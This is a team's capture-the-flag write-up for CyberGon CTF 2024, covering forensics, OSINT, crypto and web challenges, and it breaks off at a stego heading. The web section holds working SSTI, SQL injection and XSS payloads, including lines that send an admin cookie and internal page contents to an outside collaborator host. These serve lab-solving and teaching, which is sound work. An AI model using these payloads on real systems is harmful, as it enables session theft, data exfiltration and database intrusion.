CYBERGON_CTF2024

CYBORG

Participated Team Members

 Thurein Oo
 Htet Wai Phyo
 Wai Yan Kyaw
CyberGon_CTF2024
Contents
Forensics................................................................................................................................ 2
TI ...........................................................................................................................................13
Crypto....................................................................................................................................15
WEB ......................................................................................................................................23
HTTP .....................................................................................................................................38
MISC .....................................................................................................................................40
Osint ......................................................................................................................................51
Stegano .................................................................................................................................62
Reconnaissance ....................................................................................................................67
Bonus ....................................................................................................................................72
Forensics
Warm Up
Timezone
What is the timezone of the device?
Flag Format - CYBERGON_CTF2024{UTC-01:00 La Paz, Mazatlan}
Author - Andro6
I dumped the registry and viewed with registry explorer.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation

The timezone is Singapore Standard Time, but to allign with the flag format, I did some
google search and found out the answer.

CYBERGON_CTF2024{UTC+08:00 Kuala Lumpur, Singapore}

(1)
Welcome - 1
What are the device's name and the device owner's name?
Flag Format - CYBERGON_CTF2024{Device-Name, Owner Name}
Author - Andro6

In the following registry path, I found the device name.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
The following registry path revealed the registered owner name.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

CYBERGON_CTF2024{WHITE-PARTY, Sean John Combs}

(2)
Welcome - 2
What is the Facebook User ID and Bio status of device owner?
Flag Format - CYBERGON_CTF2024{12345678901234, Danger}
Author - Andro6

I searched with the device owner name on facebook, and found multiple account. But
one of them seems suspicious to me as this was like totally fake account and some
related to the challenge creators.
CYBERGON_CTF2024{61567849079733, East Coast Rapper}

(3)
Welcome - 3
Do you know the device owner's nickname?
Flag Format - CYBERGON_CTF2024{Full Name}
Author - Andro6

Opened the image file in Autopsy revealed the requested information.

CYBERGON_CTF2024{Ko Toke Gyi}

(4)
Brower - 1
How many browsers are installed on the device, and which one was installed
last?
Flag Format - CYBERGON_CTF2024{1, Browser Name}
Author - Andro6

Found the following browsers in Program Files, Program Files(x86) and User's
Appdata/Local which are 11 in total. and RockMelt was installed last.
1. RockMelt
2. Maxthon
3. Mozilla
4. Brave
5. Vivaldi
6. Opera Software
7. UC
8. Google Chrome
9. Edge
 10. IE
11. SeaMonkey

CYBERGON_CTF2024{11, RockMelt}

(5)
Brower - 2
What is the default browser, and when was it installed? (Time - UTC) Flag
Format - CYBERGON_CTF2024{Browser Name, 2024-01-01 01:01:01}
Author: Andro6

In the following registry path, I found the default browser was Maxthon.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociatio
ns\http\UserChoice

The properties of Maxthon.exe file clearly described me the installed date.

CYBERGON_CTF2024{Maxthon,2024-10-31 16:23:14}

(8)
The Location
After Halloween Party, what location is the device's owner exploring for some
fun? (The location - street/road name, city name, country)
Flag Format - CYBERGON_CTF2024{Stoneroller Street, New Market, United State}

I found the user's facebook check-in and guessed it might be the answer.
CYBERGON_CTF2024{Khao San Road, Bangkok, Thailand}

(9)
Sleep Timeout

On battery power, PC goes to sleep after ______ ? When plugged in, PC goes to
sleep after ______?
Note: Answer with minutes
Flag Format - CYBERGON_CTF2024{1, 2}
Author - Andro6

In the following registry path, the sleep timeout was set as follow, converted it into
minute and we got the flag.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\381b4
222-f694-41f0-9685-ff5bb260df2e\238c9fa8-0aad-41ed-83f4-
97be242c8f20\29f6c1db-86da-48c5-9fdb-f2b67b1f44da

CYBERGON_CTF2024{300, 60}

(11)
Bonus

On his Facebook account, he followed some accounts, and one of the followed
accounts shared a post related to him. You need to find that post, as the
flag is there.

I found Lwan Eain Ko's shared post and a quick check for edit history gave me the flag.
CYBERGON_CTF2024{s0c14L_m3d1a_O51n7!!!!!}

Badboy
Badboy

What's the name of comprosised user full name and what is the technique id
for the initial access ? If the user is Maung Yit, just use maungyit.
Filename - Badboy.zip MD5 - 61B71104B3939C7613FFC46DAFA04C58 SHA1 -
6F78FFED8BE3A6F492B2593DCF705CBB10755A59
Link1 - https://tinyurl.com/msbk7dhd Link2 - https://tinyurl.com/y42zr987
CYBERGON_CTF2024{compromiseduser_TechniqueID}
Author - iamkfromburma

Firstly, I tried with user testing, incorrect, and then the name contained in the email,
emily, incorrect again. Suddenly I got an idea to view browser history and found out the
username.
The technique is simple, qr code phishing what we also called quishing.
CYBERGON_CTF2024{emilystones_T1566}

Badboy1
Badboy1

Which email service and method was used by the attacker to deliver malware ?
If the email service is Cybergon's Fake Service, just use cybergon. Use
short name for the attack (eg: phishing > phishing).
CYBERGON_CTF2024{emailservice_methodname}
Author - iamkfromburma

Opened “Update your latest version for free movie.eml” in sublime text editor. The value
after “Received:" is the email service.
CYBERGON_CTF2024{emkei.cz_quishing}

Badboy2
Badboy2

What's the original file name of malicious binary, SHA1 and which ip:port
was used to download ? If you found the file, do some research to find the
original name and provide filename with extension.
CYBERGON_CTF2024{filename.ext_SHA1_ip:port}
Author - iamkfromburma

Uploaded to virustotal and found the filename and hash.

When I scanned the qr and got a tiny url link which then gave me the download link.
“http://192.168.1.49:8080/MovieTheratre.exe”

https://www.virustotal.com/gui/file/fe321e33dd29bcc7dba51d40283cde9f3cb7bc50cb1b
3674387f4dfbc93c7d18
CYBERGON_CTF2024{ab.exe_d87d087f87650f8ef030728160ec445160884c51_192.168.1.49
:8080}

Badboy3
Badboy3

Attacker mantained access by creating a local account on the workstation.

Can you find the Security ID related to that account and which mitre sub
technique ID belongs to that situation ?
CYBERGON_CTF2024{Security ID_TechniqueID}
Author - iamkfromburma

In windows security events, I found the event in which the username looks suspicious.
It might be the backdoor account created by attacker.

CYBERGON_CTF2024{S-1-5-21-3207570911-3252757684-1389592363-1002_T1136.001}
TI
Stealer
Stealer

Most Mac infostealers leverage a well-known script to display error

messages, in addition to utilizing an open-source tool for password
collection. Can you identify the widely-used script, the corresponding MITRE
ATT&CK technique ID associated with this type of script usage, and the name
of the open-source tool ? (Abc script = abc, Def tool = def)
CYBERGON_CTF2024{script_MITREID_toolname}
Author - iamkfromburma

From the following blog post, I got the flag.

https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
https://thehackernews.com/2024/08/new-macos-malware-cthulhu-stealer.html
CYBERGON_CTF2024{osa_T1059_chainbreaker}

RDP
RDP

Midnight Blizzard launched a spear-phishing campaign to distribute malicious

RDP files. Are you familiar with the signature identified by Microsoft
Defender for this campaign ? Additionally, do you know the number of well-
known RDP files, number of the sender domain, and the APT designation
associated with Midnight Blizzard ?
CYBERGON_CTF2024{Signature_XX_XX_APTXX}
Author - iamkfromburm

There are the answers in the following article.

https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-
large-scale-spear-phishing-campaign-using-rdp-files/
CYBERGON_CTF2024{Backdoor:Script/HustleCon.A_15_5_APT29}

Crypto
CRYPTO

DPRK has targeted cryptocurrency sectors using malicious macOS applications;

can you identify the responsible threat group, how many malware families
have been linked to it, and the functions used for persistence and C2
operations? Also reveal the associated Apple Developer ID.
CYBERGON_CTF2024{Name_totalnumberofmalwarefamiles_functionforpersistence_func
tionforC2_AppleDeveloper(ID)}
Author - iamkfromburma

You can see the related malware families in the following post.
https://thehackernews.com/2024/11/north-korean-hackers-target-crypto.html

And some related other informations in this link.

https://www.sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-
with-fake-crypto-news-and-novel-persistence/
CYBERGON_CTF2024{BlueNoroff_5_sym.install_char__char__DoPost_Avantis Regtech
Private Limited (2S8XHJ7948)}

Ransomware
Ransomware
This ransom is known as a rebrand of Royal ransom. Can you find the mutex
flag value, encryption technique and credentials theft tool name like
mimitkatz ?
CYBERGON_CTF2024{Mutexvalue_Encryption Technique_DumpingTool}
Author - iamkfromburma

Found the necessary information in the following article.

https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-ignoble-
scorpius/
CYBERGON_CTF2024{Global\WLm87eV1oNRx6P3E4Cy9_OpenSSL AES_NanoDump}
Crypto
RSA1
RSA 1
Try to get the plaintext from this encryption script.
Author - Andro6

We got flag by running following decrypt python script.

from Crypto.Util.number import getPrime, bytes_to_long
from math import gcd

flag = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
FLAG = flag.encode()

out = open('output.txt', 'w')

rsa_q = getPrime(512)
rsa_p = getPrime(512)
n = rsa_q * rsa_p
exp1 = 0x10003
exp2 = 0x10001

assert gcd(exp1, exp2) == 1

assert gcd(exp1, n) == 1
assert gcd(exp2, n) == 1

def encryption(plaintext):
cip1 = pow(plaintext, exp1, n)
cip2 = pow(plaintext, exp2, n)
return (cip1, cip2)

cip1, cip2 = encryption(bytes_to_long(FLAG))

out.write("n = "+ str(n)+ "\ncip1 = "+ str(cip1)+ "\ncip2 = "+str(cip2))

out.close()

n =
15750852827675876763873475442462133446639481525924397795921058023957766165771
47227262253627742315439203769135796580524948266501642801518362897344525906471
02313381584133512835595817708427222746495824286741840967127393187086028742577
76308046906353474272854728512180824107851509930749584360508069438342598690902
9cip1 =
69950256754119187070741220414057295159525964023691737870808579797990094306696
84250754659185869103298138534805240624620353019232493586761630507063793684892
68780226620824010909886313240249646307295107280439004545110125521058834132659
19300434674823577232105833994040714469215427142851489025266027204415434792116
cip2 =
26975575766224799967239054937673125413993489249748738598424368718984020839138
61119133315923153158285457188891137223079455912765872173881036406957905010208
94658731342181966728466273526971875841371815031880035975602290784948809177053
49140663228281705408967589237626894208542139123054938434957445017636202240137

from Crypto.Util.number import long_to_bytes, inverse

from sympy import gcdex

# Given values
n =
15750852827675876763873475442462133446639481525924397795921058023957766165771
47227262253627742315439203769135796580524948266501642801518362897344525906471
02313381584133512835595817708427222746495824286741840967127393187086028742577
76308046906353474272854728512180824107851509930749584360508069438342598690902
9
cip1 =
69950256754119187070741220414057295159525964023691737870808579797990094306696
84250754659185869103298138534805240624620353019232493586761630507063793684892
68780226620824010909886313240249646307295107280439004545110125521058834132659
19300434674823577232105833994040714469215427142851489025266027204415434792116
cip2 =
26975575766224799967239054937673125413993489249748738598424368718984020839138
61119133315923153158285457188891137223079455912765872173881036406957905010208
94658731342181966728466273526971875841371815031880035975602290784948809177053
49140663228281705408967589237626894208542139123054938434957445017636202240137
e1 = 0x10003
e2 = 0x10001

a, b, _ = gcdex(e1, e2)

if a < 0:
a = -a
cip1 = inverse(cip1, n)
if b < 0:
b = -b
cip2 = inverse(cip2, n)
a = int(a)
b = int(b)

m = (pow(cip1, a, n) * pow(cip2, b, n)) % n

flag = long_to_bytes(m)
print(flag.decode())

CYBERGON_CTF2024{54m3_m0Du1u5!!!!!}
EasyPeasy
E45y p345y
Just decode it !!!
cipher - NR_UO_{43CrbGC4!c!K}CRT21Np_YEF0_3HrB2f3
Author - Andro6

CYBERGON_CTF2024{R4!1_f3Nc3_C!pH3r_KrUb}

Twice
Twice !!
Can you decode it?
Author - Andro6

OKEPKNAIOIENKMAJOAEFLABFPCFHLJBMOJEMKHACOBEEKIANOEEBKNAIOPEKKBAEOOELKFAAOAEFL
ABFPLFOLFBAPEFBLNBIPCFHLBBEPEFBLMBJPHFCLKBPPLFOLBBEOBEEKFAAODEGKEABOIENKJAMOL
EOKNAIOCEHKHACOCEHKAAFOLEOKIANOJEMKBAEOLEOKKAPOOELKIANODEGKCAHODEGKFAAOPEKKMA
JOIENKAAFOLEOKMAJONEIKJAMOHECKJAMOBEEKIANOEEBKLAOOJEMKFAAOPEKLPBKPLFOLABFPLFO
LCBHPDFGLNBIONEIKGADOAEFLABFPOFLLCBHPKFPLFBAPJFMLNBIPPFKLIBNPHFCLKBPPPFKLFBAP
OFLKOALOPEKKEABOOELKHACODEGKNAIOCEHKDAGOGEDKAAFOOELKMAJOEEBKBAEOIENKHACOEEBKI
ANOHECKJAMOMEJKFAAOLEOKGADOOELKEABONEIKAAFODEGKJAMOGEDKDAGOGEDKEABOKEPKCAHOKE
PKJAMOAEFKGADOFEAKEABOKEPKBAEOJEMLJBMPDFGLBBEPFFALABFPPFKLLBOPOFLLJBMPFFALCBH
PAFFLEBBPKFPLPBKPHFCLFBAOFEAKDAGOFEAKEABOKEPKPAKOHECKFAAPFFALDBGPFFALEBBPNFIL
EBBPHFCLJBM
CYBERGON_CTF2024{c!7R!h_C7x1_c1Ph3R_KrUb!!!}

I Love Poetry
I Love Poetry
I love poetry for the way each line and letter aligns so perfectly. Don't use
any space and put all together. CYBERGON_CTF2024{xxxxxxxxxxxxxxxxx}
Author - iamkfromburma

Decoding the last part revealed some information.

I selected the line:word as the result and got the flag.
CYBERGON_CTF2024{Haveyoueverheardthepoemcipher}

Warm Up
Warm Up
It's only a few steps .. Ready 1 2 3 !!! CYBERGON_CTF2024{xxx_xxx_xxxx}
Author - iamkfromburma

I found binary code in Warm Up.txt

Then I convert these binaries into ASCII string, I got following hexadecimal values
I also change this output values from Base92 encoding then I goat the flag.

CYBERGON_CTF2024{b45392_h3x_b1n4ry}

Warm Up - 1
You are already familiar with these ciphers. CYBERGON_CTF2024{xxx_xxx_xxx}

Author - iamkfromburma

I found brainfuck encoding cypher and detect white space characters at warm up 1
challenge file.
I got these flags for part1 and part2.
CYBERGON_CTF2024{br41nfuck_0r_wh1t35p4c3?}

Warm Up - 2
It looks like copy and paste. Yeah, better together.
CYBERGON_CTF2024{xxx_xxxx_xxx}

2mx2jp3qf3im4oz3vq1cg1ck6r569r19x4ok5os4ok4wg6d04qc6gh5ul

Author - iamkfromburma

After identified these cyphers I found that this is Twin Hex Cipher.

Then I got the flag.

CYBERGON_CTF2024{1t_15_4ll_4b0ut_tw1n}

Chill Bro
I always enjoy chilling by watching movies or series, and Arthur Conan Doyle
is one of my favorites. CYBERGON_CTF2024{XXXXXXXXXXXXXXX}

Author - iamkfromburma

I search this challenge photo with google and i found that this picture is dancing man
cypher format.
Then I convert them into plain text with dancing man decoder.

CYBERGON_CTF2024{TAKEABREAKBROLETSDANCE}
WEB
Trickery Number
Numbers are trickey, could you find the way to solve?
Flag Format: CYBERGON_CTF2024{xxx}
Author: mgthuramoemyint
http://46.250.232.141:3000/

I read the provided server.js file and I noticed that following condition check. So if I can
solve following condition check I can get flag.

y value's length must have less than 17 and BigInt(parseInt(y)) value must be less then
original value of y. There is one trick that javascript translate "0b11111" from binary to
decimal value 31 at comparison but parseInt function convert string value '0b11111' to
integer value 0. so if use '0b11111' as y value, the flag can be got.
Greeting
Can you send a proper greeting and take the flag.
Flag Format: CYBERGON_CTF2024{xxx}
Author: mgthuramoemyint

http://46.250.232.141:5000

I browse to the target url and there is only one form to enter username. So I test by
injecting html tag and some strings and the response contains them. So I Know there
may be XSS or SSTI. I test with SSTI payloads. I test with {{7*7}} and got following
output.

And I noticed that if my payloads contain () , the server return following message.
()must be blacklist. So I find some round brackets bypass and found following one. I
used %EF%BC%88 as ( and %EF%BC%88 as ) .
payload
%7B%7Bnamespace.__init__.__globals__.os.popen%EF%BC%88%22cat+flag.txt%22%EF%B
C%89.read%EF%BC%88%EF%BC%89%7D%7D

Hidden One
Hidden One
Can you find the hidden one ? CYBERGON_CTF2024{xxx_xxx_xxx}

Author - iamkfromburma

This one makes me mad -_-. I tried to read all source codes but I can't find the flag for
this challenge. But It you try /flag.txt, you can get the flag.

DumbBot
DumbBot

The bot that created by admin is stupid enough to view every link from users.
Can you abuse the bot and find the flag?
Flag Format: CYBERGON_CTF2024{xxx} Author:mgthuramoemyint

http://46.250.232.141:13579
At /gallery endpoint, there is src parameter. There have XSS vulnerability but our
injected javascript codes can't execute bez there is CSP policy that only allow javascript
from https://www.google.com/recaptcha/ .
And I found CSP bypass at hacktrick.

I use following payload and the bot will visit my crafted malicious endpoint and send
cookie value to my server. Please notice that I use %2b (url encoded value) for '+'.
<script
src='https://www.google.com/recaptcha/about/js/main.min.js'></script><img
src=x ng-on-
error='doc=$event.target.ownerDocument;doc.defaultView.parent.location="https
://sqmz35jd0ryxjqkrxwn3unzqahg84ysn.oastify.com/"%2bdoc.cookie;'>
we get admin's cookie. If we access to admin portal with this cookie we got new hidden
parameter. But I still got 403 error when we go to flag-get endpoint. So I notice one
thing that the flag endpoint can only be accessed with internal only.
There is Xss Vulnerability admin portal via h1dd3nparam-cyBerG0n parameter and
there is no CSP policy. So I use following javascript code to force the bot to go to flag
endpoint and send back the response of flag endpoint to my server.
/admin?h1dd3nparam-cyBerG0n=<script>fetch('http://web/flag', { credentials:
'include' }).then(r1 => r1.text()).then(flag =>
{fetch(`https://x97j9ws69o9xpbtgk000j02rnit9h0loa.oastify.com/${flag}`);})</s
cript>

CYBERGON_CTF2024{Th3_DumB_dUmB_b0T!}

Agent
Agent

Agents can register and login, but can you figure out the flag?
Flag Format: CYBERGON_CTF2024{xxx}
Authors:mgthuramoemyint

http://46.250.232.141:8001/

I noticed that there is sql injection vulnerability at Insert query via user-agent header's
value.I inject sql query at User-Agent header at login request and I can check the
injected query's result at logs.php.

So I extract database name, table names and column names. And I found flag first row
from password column , users table.
hello',(select concat(username,' === ', password, '%0a') from users limit
0,1))-- -

CYBERGON_CTF2024{N0w_Ag3nt_PwN3d_Th3_S3rv3r}

Cybergon Blog
Cybergon Blog

We launched a blog where people can read updates from us.

Author: mgthuramoemyint Flag Format:CYBERGON_CTF2024{xxxx}

http://46.250.232.141:8081
When I analyze provided php file from challenge and I notice that at profile update, I can
upgrade my role from subscriber to contributor role by add custom_option parameter as
array with value 0 at profile update request.
custom_option[]=0
CYBERGON_CTF2024{w0rdpr3ss_vUlN_1s_FuN_4nd_3asy}

Event
Event

Can you find the hidden cybergon event and take the flag. Flag Format:
CYBERGON_CTF2024{xxx} Authors:mgthuramoemyint

http://46.250.232.141:5555/

I found SQL error at search.php via date parameter. So I try to fix SQL error and to
extract data from database by using sql injection.
a'%2b'b'or'1'='1';--
%2b for + ( string concatination for sql )
So I tried with union based SQL injection and extract table names and column names
form database.
a'%2b'b'and'1'='2'%0aunion%0aselect%0a1,group_concat(table_name,':::',column_
name,'%0a'),3,4,5%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=
database();--
%0a for space bypass

I got flag from cybergon table, title column.

a'%2b'b'and'1'='2'%0aunion%0aselect%0a1,group_concat(title,'%0a'),3,4,5%0afro
m%0acybergon;--
CYBERGON_CTF2024{SqL_1s_FuN_4nd_E@Sy}

Cybergon Blog 2
CybergonBlog2

Cybergon launched blog2 since blog1 is not that secure, they also have
confidential pages. Flag Format: CYBERGON_CTF2024{xx} Author: mgthuramoemyint

http://46.250.232.141:8082/

I register new account at blog and analyze the provided php file and I found
generate_nonce and read_post_data functions. These function use is_admin() function,
that function can't validate role of users. I know that is_admin function from following
talk.
https://www.youtube.com/watch?v=BZCOehWZm4o
So normal subscriber role user can generate nonce to use at read_post_data() function
to read all posts bez that function didn't check post_status, just check post_id and
nonce value.
I got flag from post_id value 5.

CYBERGON_CTF2024{W0rdPr3ss_1s_FuN_W4s_1t?}
HTTP
Protocol
Protocol

By making a proper request to this api endpoint [api.intelbyte.io], retrieve

the flag from its response.
Flag Format : CYBERGON_CTF2024{xxxxxxx}
Author : Too
Reminder: Use curl and wget exclusively

api.intelbyte.io

I got flag with Content-Type: application/json

curl -X GET -H "Content-Type: application/json" https://api.intelbyte.io

CYBERGON_CTF2024{CybEr!-2024-G0n!-GeNt}

Trespasser
Trespasser

Access to the endpoint [backend.intelbyte.io] appears restricted, only

accepting requests through a particular source. Your challenge is to figure
out how to get a valid response.
Tip: curl/wget are your friend and consider that some well-known public DNS
servers might serve as intermediaries,however not the ones you're thinking
of.
Author : Too

backend.intelbyte.io

I generated public dns server ip wordlist with chat gpt.

8.8.8.8
8.8.4.4
1.1.1.1
1.0.0.1
208.67.222.222
208.67.220.220
9.9.9.9
149.112.112.112
8.26.56.26
8.20.247.20
4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5
4.2.2.6
64.6.64.6
64.6.65.6
77.88.8.8
77.88.8.1
77.88.8.88
77.88.8.2
77.88.8.7
77.88.8.3
94.140.14.14
94.140.15.15
94.140.14.15
94.140.15.16
185.228.168.168
185.228.169.168
185.228.168.10
185.228.169.11
185.228.168.9

And I brute force X-Forwarded-For header value at get request of backend.intelbyte.io.

for i in $(cat ips.txt );do curl -X GET -H "X-Forwarded-For: "$i
https://backend.intelbyte.io;done

CYBERGON_CTF2024{3434-rvq34-5sdaf-ga4vw!}
MISC
Rules
Rules

Did you read our CTF's rules ? Are the rules are same ? Flags are separtated
by 3 different places.

CYBERGON_CTF2024{xxxx_xxxx_xxxxx}

Author - iamkfromburma

I found first part of flag at discord channel.

Second part from Rule page

Final part from cybergon blog

CYBERGON_CTF2024{d1sc0rd_p0rt4l_w3b}
Sponsors
Did you already check our sponsors ? If you watch carefully, you will see the entire flag.
CYBERGON_CTF2024{xxx_xxx_xxx}

Author - iamkfromburma

I got youtube link from ctftime cybergon ctf event page.

https://www.youtube.com/watch?v=z_ijQc-GfLQ

And I got flag from this youtube video.

CYBERGON_CTF2024{h3llfir3_p4cific_gm4_alt3r_creatig0n}

Zip Zap
Zip Zap

Can you extract all the way to the end?

Author - Andro6

I extract provided zip file by using following python script.

import os
import subprocess

def extract_nested_zip_with_password(zip_path, output_dir):

current_zip_path = zip_path

for layer in range(1, 1000): # Adjust max layers as needed

try:
# Create temporary directory to extract the current layer
layer_output_dir = os.path.join(output_dir, f"layer_{layer}")
os.makedirs(layer_output_dir, exist_ok=True)

# List contents of the current zip file to get the inner file
name
result = subprocess.run(
['7z', 'l', current_zip_path],
capture_output=True, text=True, check=True
)
# Extract the inner file name (assumes one file per ZIP layer)

for line in result.stdout.splitlines():

print(line)
if "password" in line: # Find the ZIP file
inner_file_name = line.split()[-1]
break
else:
print(f"No inner ZIP file found in layer {layer}")
break

# Use the inner file name as the password

print(inner_file_name)
password = inner_file_name.split('-')[-1].split('.')[0].strip()

# Extract the inner ZIP file

subprocess.run(
['7z', 'x', f'-p{password}', current_zip_path, f'-
o{layer_output_dir}'],
check=True, stdout=subprocess.DEVNULL
)

# Update current_zip_path to point to the new inner zip file

current_zip_path = os.path.join(layer_output_dir,
inner_file_name)

except subprocess.CalledProcessError as e:
print(f"Extraction failed at layer {layer}: {e}")
break

if __name__ == "__main__":
# Define the path to the outermost zip file and output directory
outer_zip = "500.zip" # Replace with the actual file path
output_directory = "extracted_files"

# Create the output directory if it doesn't exist

os.makedirs(output_directory, exist_ok=True)

# Start the extraction process

extract_nested_zip_with_password(outer_zip, output_directory)

And We got fake flag at lowest zip layer -_-. But we notice that password is something .

CYBERGON_CTF2024{y0U_g07_r341_F14g}

Triple Quiz
Triple Quiz

You’ll recognize it when you see it, it’s something you’ve already done
before.

CYBERGON_CTF2024{XXXXXXXXXXXXXXXXXXXXX}

Author - iamkfromburma

We got Triple Quiz.wav file when extract provided rar file. But before extract, we need
to crack zip password file with rar2john and rockyou wordlist.
So upload that .wav file to morse audio decoder and we got T9 encoded value.

Convert from T9 to text

CYBERGON_CTF2024{MORSEWITHTNINE}
Favorite Menu & Restaurant
Favorite Menu & Restaurant

Although I always play CTFs in the weekend, I don't have a chance to update
new upcoming event in my list. But, I only need cybergon's .. , they already
have one.There will be some password protected zip file. If you cannot crack,
you will need to find out the zip password (City_Country) that is belonged to
the stolen boat by using some osint. Please write menu and name like the
given format.

CYBERGON_CTF2024{Favorite Menu_Restaurant Name}.

Author - iamkfromburma

We accidentally found google calendar link from CyberGon official discord channel
(#ctf)
https://calendar.google.com/calendar/u/0/embed?src=c_2b3f2196ee1f41261f3f4109
69f8bce583926578d1acf25a1393799bf4b4fdab@group.calendar.google.com&ctz=Asia/B
angkok&fbclid=IwY2xjawExbuZleHRuA2FlbQIxMAABHUVBoorF8hFwRmFOUjRKwQ-
rlBulQeoCEB44oyKi9vQ8Q6JUjkSoQeCgpw_aem_PgpJOof1UuoV0pq9CtGPDQ

When we enter above calendar link, we found some hex values from description.

We convert from hex to string, got zip file download link.

https://tinyurl.com/bddetmxh
We search Boat.jpg at google image search and found the model of boat "Oceanis
350", so we find with this model at this websit. https://stolenboats.info/en/theft/2856

We know City and Country ( La Rochelle_France ) as password for Ghost Sound.zip.

When we extract this zip file, we got Ghost Sound.wav file. Analyze this wav file with
Sonic visualizer and get following three words.
We use this three words at three words website to find somethings. And we found
following restaurant.

We search some Favorite Menu from this restaurant and found that menu.
CYBERGON_CTF2024{Beef Soup_Heng Chun Seng}

Your Favorite Song

Do you know that is the best cover song?

password - What does the song name mean in English?

Author - Andro6

This challenge video file is about APT music. I used binwalk tool to extract embedded
data from music video file.

Then I use apartment for zipfile password to extract zip file. Then I got the flag from
metadata.txt file.
CYBERGON_CTF2024{Y0u_g07_r053}
Osint
The Flight
The Flight

The password you discovered in the Triple Quiz challenge (MISC category) is
the nickname of a footballer. His club recently appointed a new manager, and
the manager has recently traveled by flight. Can you track the details of
this flight?

CYBERGON_CTF2024{Depature City's IATA, Arrival City's IATA, ICAO Address}

Author - iamkfromburma

The password I discovered in the Triple Quiz challenge is iceman. So we search iceman
football player at google and we found following Manchester United Player.

Now we know the football team, new manager and continue finding flight with manager
name.
https://www.itv.com/news/granada/2024-11-11/thousands-track-new-united-
managers-plane-as-he-makes-way-from-portugal

CYBERGON_CTF2024{BYJ,MAN,4950D2}

Favorite Journal
It's one of my favorite childhood journals. Can you find the published date
and the registration number of printing house for the volume 1 - number 1 ?

CYBERGON_CTF2024{X-X-XX_XXXX}

Author - iamkfromburma

This challenge is about Shwe Thway journal and we need to find it's published date and
the registration number of printing house for the volume 1 - number 1.
I found this data by searching in search engines.
CYBERGON_CTF2024{4-1-69-0032}

The Stadium
One of my colleagues loves to play hockey. He sent me this photo recently and
asked me where it is located, its capacity, and when it was built. (Please
remove "," for Capacity). The question is based on the stadium. So, target to
find the stadium's capacity and and forget the keyword "hockey" at the
moment.

CYBERGON_CTF2024{City_Province_Capacity_BuiltYear}

Author - iamkfromburma

For this image I found Center Bell stadium on google search engine. It's located in
Montreal, Quebec, Canada. Opened on March 16, 1996.
Then I more search about of hockey stadium in Canada then I found the correct info of
this stadium.

CYBERGON_CTF2024{Montreal_Quebec_21105_1996}

The Statute
Can you locate the location of the person who took this photo ?

[Example - 01.01234 02.12345 = CYBERGON_CTF2024{01.0123_02.1234}]

Author - iamkfromburma

I found this image is about Maha Bodhi Ta Htaung Standing Buddha.

Then I search google map with street view and I found the location of the person who
took this photo.

CYBERGON_CTF2024{22.0801555,95.2885383}

Vacation (1)
Can you find the location of this photo? To identify Hotel Name, City and
Country.

Flag Format - CYBERGON_CTF2024{Novotel Hotel, Bangkok, Thailand}

This photo is view of Halong Park (Dragon Park) from a hotle which is Muong Thanh
Luxury Ha Long Centre Hotel.

CYBERGON_CTF2024{Muong Thanh Luxury Ha Long Centre Hotel, Ha Long, Vietnam}

Vacation (2)
Nice! You found the hotel name in Vacation (1). Can you find another location
in this photo as well?

Flag Format - CYBERGON_CTF2024{The specific name of location}

Author - Andro6

We found this photo on Facebook, which was uploaded by one of the members of
Cybergon who visited Halong, Vietnam, for his vacation on his Facebook social media.
The we observed this photo with using search engines and we found the location.

This places is Làng Rèn Thần Kiếm, where traditional sword forging meets the serene
beauty of Hạ Long, Vietnam.

CYBERGON_CTF2024{Lang Ren Than Kiem}

The pagoda
Can you locate the donation center's position using what3words? Also, do you
know how many standing Buddha statues are there, and could you provide their
names ? (remove "///" for what3words and used only top left value, the name
should be alphabetical order)

CYBERGON_CTF2024{xxxx.xxxx.xxxx_number_Name_Name_Name_Name}

Author - iamkfromburma

This photo is about Ananda Temple.

Then we search Ananda Pagoda in what3words and we found the location of Donation
Center.

After observed we found the names of four standing Buddha statues.

CYBERGON_CTF2024{doorstops.overthrows.folder_4_Gautama_Kakusandha_Kassapa_Kan
agamana}

The Train & The Bridge

Can you find the built year of the train from the photo, bridge name from the
video and the published date of this video ?

[Example - 2024, Abc Def Bridge, 01 Jan 1991 =

CYBERGON_CTF2024{2024_abcdef_01-01-1991}]
CYBERGON_CTF2024{1969_gokteik_09-05-2019}

History repeats itself

A historic event played a key role in this picture. Can you identify the date
of that event?

Flag Format - CYBERGON_CTF2024{MMMM_dd_yyyy} Example -

CYBERGON_CTF2024{December_01_2024}

This photo is about Panglong Agreement Event. And then we find out the
Panglong_Agreement event date.
CYBERGON_CTF2024{February_12_1947}
Stegano
Invisible
Sometimes it's a relief to be invisible. CYBERGON_CTF2024{xxxx_xxxx_xxxxx}

Author - iamkfromburma

After full zoom out and carefully observed i found out this image has some texts.

Then I use stegsolve tool to analyze images in different planes by taking off bits of the
image. Finally I got the flag text.
CYBERGON_CTF2024{getyourflag}

What's behind the wall ?

